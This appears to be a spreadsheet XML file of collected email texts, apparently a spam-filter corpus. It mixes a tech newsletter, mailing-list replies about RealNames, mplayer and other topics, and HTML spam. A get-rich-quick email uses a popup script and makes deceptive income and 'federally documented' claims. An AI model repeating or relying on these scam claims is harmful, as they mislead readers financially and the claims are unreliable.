 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q212722"&gt;Q212722 - WD2000: Compile Error If VBA Code Doesn't Find Comments (Q212722)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q326537"&gt;Q326537 - OFFXP: Smart Tags for Names, Telephone Numbers, Addresses, and Stock Symbols Do Not Appear As Expected (Q326537)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;KILL BANNERS AND POPUPS DEAD&lt;/b&gt; Banner Zapper is a utility that 
 automatically removes 100% of unsolicited popup ads with 
 Internet Explorer (version 4.0 and above), any banner windows coming 
 with free or low-cost services such as dial-up Internet access, and 
 all popup ads with Netscape Navigator (all versions). Version 3.0 enhances 
 many of the functionalities from previous versions and includes additional 
 special support for Internet Explorer.
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=41742"&gt;Download Your Free Trial Now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Technical Overview of .NET File Services&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/windows.netserver/techinfo/overview/file.mspx"&gt;http://www.microsoft.com/windows.netserver/techinfo/overview/file.mspx&lt;/a&gt;
 &lt;p&gt;.NET Server is more than Windows 2000 with a look of 
 Windows XP, of that you can be sure. Common sense has 
 finally won, with the developers delivering many more 
 command line tools to manage core services. Of course, this 
 isn't the only thing being brought to the .NET table. 
 Improvements in DFS, defrag, chkdsk and EFS just scratch the 
 surface. New WHQL processes are being established for 
 antivirus products, allowing them to hook directly into the 
 OS. Virtual Disk Service, Volume Shadow Copy Service and 
 promised improvements in the File Replication Service should 
 make managing storage easier and more flexible. 
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;P4 Performance Goes to Court&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.pcworld.com/news/article/0,aid,104075,tk,dn081602X,00.asp"&gt;http://www.pcworld.com/news/article/0,aid,104075,tk,dn081602X,00.asp&lt;/a&gt;
 &lt;p&gt;A class action lawsuit has been filed in California by a 
 small group of PC owners that are miffed about the 
 performance, or lack thereof, that was promised by Intel, HP 
 and Gateway. Since the day the P4 was introduced, the 
 overall performance has been criticized, so this would seem 
 to be more an issue of failing to do proper due diligence on 
 the part of the customer, if you ask me. This is one of 
 those subjective questions that will come down to fancy 
 lawyers and luck of the jury pool draw. If they believed 
 everything the TV commercials had to say, then the litigants 
 got what they had coming. One beer tastes better than the 
 next, only one car can save your life in a crash, etc. This 
 general lag in P4 muscle has been publicized since day one, 
 as have crash test results on the part of the government and 
 third-party organizations. Should we be suing auto makers 
 when someone dies in a 5-star rated vehicle? That Volvo will 
 save your life, ya know. Does this set an unreasonable 
 expectation? Only if you consider advertising an education.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href="http://www.lockergnome.com/issues/techspecialist/20020819.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020819.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [mothlight@fastmail.fm]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&lt;p&gt;&lt;table border=0 cellpadding=0 cellspacing=1 width=145 bgcolor="#ADC1CE"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="http://www.esellerate.net" target="_blank"&gt;&lt;img src="http://www.lockergnome.com/images/ads/esellerate_banner.gif" height=44 width=143 border=0&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#FFFFFF"&gt;
 	&lt;table border=0 cellpadding=3 cellspacing=0 width=100%&gt;
 	&lt;tr&gt;&lt;td height=5&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td style="font-family: verdana,arial,helvetica; font-size: 9px"&gt;&lt;b style="font-family: verdana,arial,helvetica; font-size: 10px"&gt;Dr. Speed MemRx&lt;/b&gt;&lt;br&gt;Excellent tool for optimizing Windows based computers. Runs quietly in the background working to optimize and speed up your computer!&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td align=right style="font-family: verdana,arial,helvetica; font-size: 9px"&gt;&lt;a href="http://store.eSellerate.net/s.asp?SKURefnum=SKU3526179060&amp;AffIDC=PTL878700195&amp;Cmd=BUY" target="_blank"&gt;buy&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;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</si>
  <si>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Re: RealNames ceases trading
</t>
  </si>
  <si>
    <t xml:space="preserve">This comment probably goes into better late than never but:
 I wonder if their decision to open source their code had
 anything to do with it.
 I've read through their asset sheet, but it doesn't say anything
 about their real assets--their customers.  Anyone know if they
 have any left?
 Greg
 Jim Whitehead wrote:
 &gt; Via Dave's Scripting News:
 &gt; 
 &gt; http://www.theregister.co.uk/content/23/25245.html
 &gt; 
 &gt; RealNames Corp., the VC-funded wheeze that promised to short-circuit the DNS
 &gt; system by doing an exclusive deal with Microsoft, has announced that it will
 &gt; cease trading as of today.
 &gt; 
 &gt; RealNames' proposition was simple, and on the face of it, a no-brainer. Type
 &gt; a real word or phrase into your browser and it would guide you to your
 &gt; destination, bypassing all this cumbersome domain name business. A nice
 &gt; idea, but one based on the assumption that people are fairly stupid, and
 &gt; couldn't figure out that Comp USA's website might be say, CompUSA.com, and
 &gt; that even if you mistook whitehouse.gov for whitehouse.org, you'd be unhappy
 &gt; about the serendipitous diversion.
 &gt; 
 &gt; *snip*
 &gt; 
 &gt; Microsoft cancelled its contract with RealNames earlier this year, and as a
 &gt; consequence - the company has no "Plan B" - it's now toast.
 &gt; 
 &gt; - Jim
 &gt; 
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 &gt; 
 -- 
 Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
 Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt;Once upon a time, Roi wrote :
 &gt;
 &gt;  
 &gt;
 &gt;&gt;Since I upgraded to redhat8 mplayer -vo sdl isnt working for me
 &gt;&gt;It gives me black screen and I only hear sound.
 &gt;&gt;
 &gt;&gt;can anyone help me with this ?
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;I'll test this as soon as I can.
 &gt;
 &gt;  
 &gt;
 &gt;&gt;btw,
 &gt;&gt;also the source rpm specified that I can do --without libdv
 &gt;&gt;but it didn't work, worked for lirc and arts.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Should be fixed : You probably had libdv-devel installed and MPlayer
 &gt;automatically detected it. The new spec file explicitely passes
 &gt;--disable-libdv when the package is rebuilt with --without libdv.
 &gt;
 &gt;Grab the "fr2.1" spec from here :
 &gt;http://freshrpms.net/builds/index.html?build=mplayer
 &gt;
 &gt;Matthias
 &gt;
 &gt;  
 &gt;
 The new spec didn't even want to build the package
 something with config.mak
 Also this new spec looks like the old one, it got libdv and libdv-devel
 in the BuildRequires so I just used the normal spec and removed it manully.
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Isn't this the story where someone's "Dream" has the ability to change
 reality -- then you find the whole world is their dream?
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Monday, September 09, 2002 4:26 AM
 &gt; To: John Evdemon
 &gt; Cc: fork@example.com
 &gt; Subject: RE: Recommended Viewing
 &gt; 
 &gt; Agreed, completely.  I totally grokked the notion of unintened
 consequence
 &gt; with the original.
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 John
 &gt; Evdemon
 &gt; Sent: Monday, September 09, 2002 7:03 AM
 &gt; To: Fork@xent.com
 &gt; Subject: Re: Recommended Viewing
 &gt; 
 &gt; 
 &gt; On 8 Sep 2002 at 22:15, Geege Schuman wrote:
 &gt; 
 &gt; &gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
 &gt; &gt; the original?
 &gt; &gt;
 &gt; By "original" if you are referring to the old PBS version, I liked
 that
 &gt; version much better.  Much more thought provoking.
 &gt; 
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Retire Early -- Earn Easy Online Income
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;SCRIPT&gt;
 browserVer=parseInt(navigator.appVersion); 
 HB=window.open('http://61.129.68.32/empires/ghi.html','HBback','toolbar=no,menubar=no,status=no,directories=no,location=no,scrollbars=no,resizable=no,width=468,height=120' );
 if(browserVer&gt;=4){ 
 window.focus(); 
 }
 &lt;/SCRIPT&gt;
 	&lt;head&gt;
 		&lt;title&gt;Internet Empires&lt;/title&gt;
 	&lt;/head&gt;
 	&lt;body bgcolor="#4682b4"&gt;
 		&lt;div align="center"&gt;
 			&lt;table border="0" cellpadding="0" cellspacing="0" width="465" bgcolor="white"&gt;
 				&lt;tr height="5"&gt;
 					&lt;td width="220" height="5"&gt;&lt;/td&gt;
 					&lt;td width="15" height="5"&gt;&lt;/td&gt;
 					&lt;td width="230" height="5"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td width="220"&gt;
 						&lt;table border="0" cellpadding="0" cellspacing="0" width="214"&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Take Control of your&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="5"&gt;
 								&lt;td height="5" width="15"&gt;&lt;/td&gt;
 								&lt;td height="5" width="208"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" color="#0000cd" size="4"&gt;FINANCIAL FUTURE&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="5"&gt;
 								&lt;td height="5" width="15"&gt;&lt;/td&gt;
 								&lt;td height="5" width="208"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt;Make&lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt; &lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="6" color="navy"&gt;$7,000&lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt; &lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt;/ Month&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;i&gt;Learn how to get. . .&lt;/i&gt;&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="5" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" color="#8b0000"&gt;5 Money-Making &lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="5" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" color="#8b0000"&gt;Web Sites&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width="15"&gt;&lt;/td&gt;
       &lt;td width="230"&gt;&lt;a href="http://61.129.68.32/empires/index.php?Aff=11"&gt;&lt;img src="http://61.129.68.32/empires/email/woman001.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="15"&gt;
 					&lt;td height="15" colspan="3"&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="19"&gt;
 					&lt;td height="19" colspan="3"&gt;
 						&lt;div align="center"&gt;
 							&lt;table border="0" cellpadding="0" cellspacing="0" width="410"&gt;
 								&lt;tr&gt;
 									&lt;td&gt;
 										&lt;hr&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr&gt;
 									&lt;td&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Dear Friend,&lt;/font&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;You're about to discover how you can have FIVE of your own Internet businesses set up and taking orders within 29 minutes...for less than half of what most people spend on groceries!&lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;But first, please let me introduce myself... &lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Hi! My name is Frank Kern. I'd like for you to know up front that I'm not an Internet Guru...Not A Computer Wiz...And Not A Marketing Genius. &lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;First of all, I'll admit that I don't expect you to believe a single word I say. &lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;After all, how many times a day are you BOMBARDED with some &amp;quot;get-rich-quick&amp;quot; scheme on the Internet?&lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;You probably get a brand new promise of instant wealth every few hours in your e-mail box and if you're anything like me, you've tried a few and been left with nothing but a hole in your pocket!&lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Well, I've got great news for you. &lt;/font&gt;&lt;/p&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;My unprofessional, little &amp;quot;Home Made&amp;quot; web site brought in $115,467.21 last year and you're about to discover how. . . &lt;/font&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;
 										&lt;div align="center"&gt;
 											&lt;p&gt;&lt;b&gt;&lt;font size="3"&gt;. . . &lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt;&lt;i&gt;you can do the same!&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 										&lt;/div&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="10"&gt;
 									&lt;td height="10"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;
 										&lt;hr&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="10"&gt;
 									&lt;td height="10"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr&gt;
 									&lt;td&gt;
 										&lt;div align="center"&gt;
                   &lt;p&gt;&lt;font color="#00008b" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="4"&gt;&lt;a href="http://61.129.68.32/empires/index.php?Aff=11"&gt;Click 
                     Here For Federally Documented Proof&lt;/a&gt;&lt;br&gt;
 												&lt;/font&gt;&lt;/p&gt;
 										&lt;/div&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 							&lt;/table&gt;
 						&lt;/div&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="19"&gt;
 					&lt;td width="220" height="19"&gt;&lt;/td&gt;
 					&lt;td width="15" height="19"&gt;&lt;/td&gt;
 					&lt;td width="230" height="19"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="19"&gt;
 					&lt;td width="220" height="19"&gt;&lt;/td&gt;
 					&lt;td width="15" height="19"&gt;&lt;/td&gt;
 					&lt;td width="230" height="19"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/div&gt;
 		&lt;p&gt;&lt;/p&gt;
 	&lt;P align=center&gt;&lt;B&gt;&lt;FONT size=2&gt;&lt;font color="Silver"&gt;This message is coming to you as a result of an Opt-in Relationship our Clients have had with you. &lt;br&gt;If you simply wish to be Removed from all future Messages, 
 then&lt;/FONT&gt;&lt;FONT color=#ff0000&gt; &lt;A href="http://61.129.68.32/empires/remove/remove.html"&gt;CLICK 
 HERE&lt;/A&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
  [8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] That wacky imam
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Sheikh Abu Hamza al-Masri, our maddest of mad mullahs and a cartoon bogeyman
 &gt; to scare the kiddies, spent a quiet and contemplative bank holiday playing
 &gt; with his own children in Victoria Park, Hackney.
 For an alternative, and rather more factually based, rundown on Hamza's 
 career, including his belief that all non Muslims in Yemen should be murdered 
 outright:
 http://memri.org/bin/articles.cgi?Page=archives&amp;Area=ia&amp;ID=IA7201
 Martin
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --1d9d507a-d864-478d-ba24-917611e50332
 Content-Type: text/html; charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!-- If this flyer does not appear correctly and/or images do not appear, go =
 to the following in your browser window www.webxperts.com --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;WebXperts Design, Inc.    We Build The Internet.&lt;/title&gt;
 &lt;style type=3D"text/css"&gt;&lt;!--body{font-family: Verdana; font-size:10px; =
 color:white;}td{font-family:  Verdana; font-size:10px; =
 color:white;}a{font-family: Verdana; font-size:10px; =
 color:cccccc;}a:hover{font-family: Verdana; font-size:10px; =
 color:yellow;}--&gt;&lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666"&gt;&lt;div align=3D"center"&gt;
 &lt;table width=3D"720"&gt;&lt;tr&gt;&lt;td&gt;&lt;hr&gt;
 If This Flyer does not appear correctly and/or images do not appear, please =
 click the following link: &lt;a href=3D=
 "http://www.webxperts.com"&gt;http://www.webxperts.com&lt;/a&gt;.&lt;hr align=3D=
 "center"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"720"&gt;
   &lt;tr&gt;   &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D=
 "94" height=3D"1" border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"106" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"47" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"59" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"119" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"34" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"73" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"111" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"77" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;   &lt;td&gt;&lt;img src=3D=
 "http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" height=3D"1" border=3D=
 "0"&gt;&lt;/td&gt;  &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"webdesign"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c1.gif" ALT=3D"Web =
 Design" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"app_dev"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c2.gif" ALT=3D=
 "Application Development" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td colspan=3D"2"&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"webmain"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c3.gif" ALT=3D=
 "Website Maintenance" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"guaranteed"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c5.gif" ALT=3D=
 "Guarenteed Site Placement" &gt;&lt;/form&gt;
  &lt;/td&gt;
    &lt;td colspan=3D"2"&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"ecommerce"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c6.gif" ALT=3D=
 "E-Commerce Solutions" &gt;&lt;/form&gt;
  &lt;/td&gt;
    &lt;td&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"wireless"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c8.gif" ALT=3D=
 "Wireless Development" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;
   &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"intranets"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r1_c9.gif" ALT=3D=
 "Intranets" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" =
 height=3D"33" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td colspan=3D"9"&gt;&lt;img name=3D"logoandmiddle" src=3D=
 "http://www.eluxmedia.com/forms/logoandmiddle.gif" width=3D"720" height=3D=
 "150" border=3D"0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" =
 height=3D"150" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td colspan=3D"3"&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"webdesign"&gt;&lt;input =
 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r3_c1.gif" ALT=3D=
 "HTML Version" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td colspan=3D"3"&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"mixedmedia"&gt;&lt;input =
